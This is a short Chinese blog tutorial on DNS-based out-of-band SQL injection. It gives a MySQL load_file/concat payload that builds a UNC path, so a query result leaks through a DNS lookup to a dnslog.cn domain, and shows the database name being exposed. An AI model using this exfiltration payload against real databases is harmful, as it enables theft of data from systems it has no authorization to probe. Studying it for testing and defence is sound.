SQL注入:DNS注入

作者: const27 分类: All,sql注入 发布时间: 2020-06-03 10:23

dns注入

payload: select load_file(concat(“\\\\",payload,".域名\\a");

具体步骤:
http://www.dnslog.cn该网站上取得一个域名,在file_priv是空的情况下,使用上面的payload,load_file会自动去尝试解析该域名,解析的过程中它会在各个dns服务器中留下记录,这个记录就会把payload中的值给暴露出来,而我们这个网站里会记录下他给你的域名dns记录,在那个记录里面就会看见payload返回值了
image
image
test是我的库名,可见已经被爆出来了

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

13 + 15 =

标签云